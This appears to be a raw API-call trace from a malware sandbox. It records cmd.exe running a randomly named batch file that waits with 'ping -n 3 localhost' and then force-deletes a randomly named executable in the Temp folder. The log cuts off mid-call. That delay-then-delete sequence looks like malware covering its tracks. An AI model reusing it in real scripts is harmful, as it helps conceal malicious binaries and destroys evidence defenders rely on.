[0100.213] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.213] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", fInfoLevelId=0x1, lpFindFileData=0x22ef1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ef1c) returned 0x3208f0 [0100.213] FindClose (in: hFindFile=0x3208f0 | out: hFindFile=0x3208f0) returned 1 [0100.213] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0100.213] GetConsoleTitleW (in: lpConsoleTitle=0x22f3f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.213] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0100.216] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0100.216] IdentifyCodeAuthzLevelW () returned 0x1 [0100.222] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0100.222] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0100.222] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0100.222] CloseCodeAuthzLevel () returned 0x1 [0100.222] SetErrorMode (uMode=0x0) returned 0x0 [0100.222] SetErrorMode (uMode=0x1) returned 0x0 [0100.222] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", nBufferLength=0x104, lpBuffer=0x3204e8, lpFilePart=0x22f2e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd", lpFilePart=0x22f2e0*="QQZAKkLZ.cmd") returned 0x3a [0100.222] SetErrorMode (uMode=0x0) returned 0x1 [0100.222] CmdBatNotification () returned 0x0 [0100.223] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0100.223] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0100.223] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.223] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.223] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.223] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.223] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x91, lpOverlapped=0x0) returned 1 [0100.223] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0100.224] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.224] GetFileType (hFile=0x58) returned 0x1 [0100.224] _get_osfhandle (_FileHandle=3) returned 0x58 [0100.224] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0100.224] _wcsicmp (_String1="ping", _String2=")") returned 71 [0100.224] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0100.224] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0100.224] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0100.224] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0100.224] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0100.224] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0100.226] _tell (_FileHandle=3) returned 21 [0100.226] _close (_FileHandle=3) returned 0 [0100.226] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f0dc | out: _Buffer="\r\n") returned 2 [0100.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.226] GetFileType (hFile=0x7) returned 0x2 [0100.226] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f09c | out: lpMode=0x22f09c) returned 1 [0100.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.227] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f0c8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f0c8*=0x2) returned 1 [0100.227] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0100.227] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0100.227] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f0d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0100.227] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f0d8 | out: _Buffer=">") returned 1 [0100.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.227] GetFileType (hFile=0x7) returned 0x2 [0100.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.227] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0a0 | out: lpMode=0x22f0a0) returned 1 [0100.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.227] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f0cc, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f0cc*=0x19) returned 1 [0100.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.228] GetFileType (hFile=0x7) returned 0x2 [0100.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f324 | out: lpMode=0x22f324) returned 1 [0100.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x320958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x22f350, lpReserved=0x0 | out: lpBuffer=0x320958*, lpNumberOfCharsWritten=0x22f350*=0x4) returned 1 [0100.228] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f35c | out: _Buffer=" -n 3 localhost ") returned 16 [0100.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.228] GetFileType (hFile=0x7) returned 0x2 [0100.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.229] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f31c | out: lpMode=0x22f31c) returned 1 [0100.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x22f348, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f348*=0x10) returned 1 [0100.229] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f37c | out: _Buffer="\r\n") returned 2 [0100.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.229] GetFileType (hFile=0x7) returned 0x2 [0100.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.229] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f33c | out: lpMode=0x22f33c) returned 1 [0100.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.229] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f368, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f368*=0x2) returned 1 [0100.230] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0100.230] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0100.230] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0100.230] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0100.230] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0100.230] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0100.230] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0100.230] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0100.230] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0100.230] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0100.230] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0100.230] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0100.230] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0100.230] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0100.230] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0100.230] _wcsicmp (_String1="ping", _String2="START") returned -3 [0100.230] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0100.230] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0100.230] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0100.230] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0100.230] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0100.231] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0100.231] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0100.231] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0100.231] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0100.231] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0100.231] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0100.231] SetErrorMode (uMode=0x0) returned 0x0 [0100.231] SetErrorMode (uMode=0x1) returned 0x0 [0100.231] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x330550, lpFilePart=0x22f120 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f120*="Desktop") returned 0x18 [0100.231] SetErrorMode (uMode=0x0) returned 0x1 [0100.231] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.231] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0100.232] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.232] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0xffffffff [0100.232] GetLastError () returned 0x2 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0xffffffff [0100.232] GetLastError () returned 0x2 [0100.232] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0x330838 [0100.232] FindClose (in: hFindFile=0x330838 | out: hFindFile=0x330838) returned 1 [0100.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0xffffffff [0100.233] GetLastError () returned 0x2 [0100.233] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ee9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee9c) returned 0x330838 [0100.233] FindClose (in: hFindFile=0x330838 | out: hFindFile=0x330838) returned 1 [0100.233] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0100.233] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0100.233] GetConsoleTitleW (in: lpConsoleTitle=0x22eeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.233] SetErrorMode (uMode=0x0) returned 0x0 [0100.233] SetErrorMode (uMode=0x1) returned 0x0 [0100.233] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x330a98, lpFilePart=0x22ea0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22ea0c*="Desktop") returned 0x18 [0100.233] SetErrorMode (uMode=0x0) returned 0x1 [0100.233] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0100.233] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0100.233] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.233] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.233] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0xffffffff [0100.234] GetLastError () returned 0x2 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0xffffffff [0100.234] GetLastError () returned 0x2 [0100.234] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0x330d80 [0100.234] FindClose (in: hFindFile=0x330d80 | out: hFindFile=0x330d80) returned 1 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0xffffffff [0100.234] GetLastError () returned 0x2 [0100.234] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e788, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e788) returned 0x330d80 [0100.234] FindClose (in: hFindFile=0x330d80 | out: hFindFile=0x330d80) returned 1 [0100.234] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0100.234] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0100.234] GetConsoleTitleW (in: lpConsoleTitle=0x22ec80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.234] InitializeProcThreadAttributeList (in: lpAttributeList=0x22eb08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ebd0 | out: lpAttributeList=0x22eb08, lpSize=0x22ebd0) returned 1 [0100.235] UpdateProcThreadAttribute (in: lpAttributeList=0x22eb08, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ebc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22eb08, lpPreviousValue=0x0) returned 1 [0100.235] GetStartupInfoW (in: lpStartupInfo=0x22eac4 | out: lpStartupInfo=0x22eac4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0100.235] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0100.236] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22eb64*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ebb0 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x22ebb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xc38, dwThreadId=0xc3c)) returned 1 [0100.347] CloseHandle (hObject=0x58) returned 1 [0100.347] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.347] GetEnvironmentStringsW () returned 0x320970* [0100.347] FreeEnvironmentStringsW (penv=0x320970) returned 1 [0100.347] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0104.281] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22eaa4 | out: lpExitCode=0x22eaa4*=0x0) returned 1 [0104.281] CloseHandle (hObject=0x54) returned 1 [0104.281] _vsnwprintf (in: _Buffer=0x22ebec, _BufferCount=0x13, _Format="%08X", _ArgList=0x22eab0 | out: _Buffer="00000000") returned 8 [0104.281] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0104.281] GetEnvironmentStringsW () returned 0x322c28* [0104.281] FreeEnvironmentStringsW (penv=0x322c28) returned 1 [0104.281] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0104.281] GetEnvironmentStringsW () returned 0x322c28* [0104.281] FreeEnvironmentStringsW (penv=0x322c28) returned 1 [0104.281] DeleteProcThreadAttributeList (in: lpAttributeList=0x22eb08 | out: lpAttributeList=0x22eb08) [0104.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.282] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.282] SetConsoleInputExeNameW () returned 0x1 [0104.282] GetConsoleOutputCP () returned 0x1b5 [0104.282] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.282] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0104.282] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0104.282] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.282] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.283] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.283] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0104.283] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x7c, lpOverlapped=0x0) returned 1 [0104.284] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.284] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n") returned 62 [0104.284] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.284] GetFileType (hFile=0x54) returned 0x1 [0104.284] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.284] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.285] _tell (_FileHandle=3) returned 83 [0104.285] _close (_FileHandle=3) returned 0 [0104.285] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f0dc | out: _Buffer="\r\n") returned 2 [0104.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.285] GetFileType (hFile=0x7) returned 0x2 [0104.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.286] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f09c | out: lpMode=0x22f09c) returned 1 [0104.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.286] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f0c8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f0c8*=0x2) returned 1 [0104.286] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0104.286] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.286] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f0d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0104.286] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f0d8 | out: _Buffer=">") returned 1 [0104.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.286] GetFileType (hFile=0x7) returned 0x2 [0104.286] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.286] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0a0 | out: lpMode=0x22f0a0) returned 1 [0104.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.286] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f0cc, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f0cc*=0x19) returned 1 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] GetFileType (hFile=0x7) returned 0x2 [0104.287] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.287] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f324 | out: lpMode=0x22f324) returned 1 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x32f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f350, lpReserved=0x0 | out: lpBuffer=0x32f008*, lpNumberOfCharsWritten=0x22f350*=0x3) returned 1 [0104.287] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f35c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" ") returned 58 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] GetFileType (hFile=0x7) returned 0x2 [0104.287] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.287] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f31c | out: lpMode=0x22f31c) returned 1 [0104.287] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.287] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f348, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f348*=0x3a) returned 1 [0104.288] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f37c | out: _Buffer="\r\n") returned 2 [0104.288] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.288] GetFileType (hFile=0x7) returned 0x2 [0104.288] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.288] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f33c | out: lpMode=0x22f33c) returned 1 [0104.288] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.288] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f368, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f368*=0x2) returned 1 [0104.288] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0104.288] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0104.288] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0104.288] GetConsoleTitleW (in: lpConsoleTitle=0x22eeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 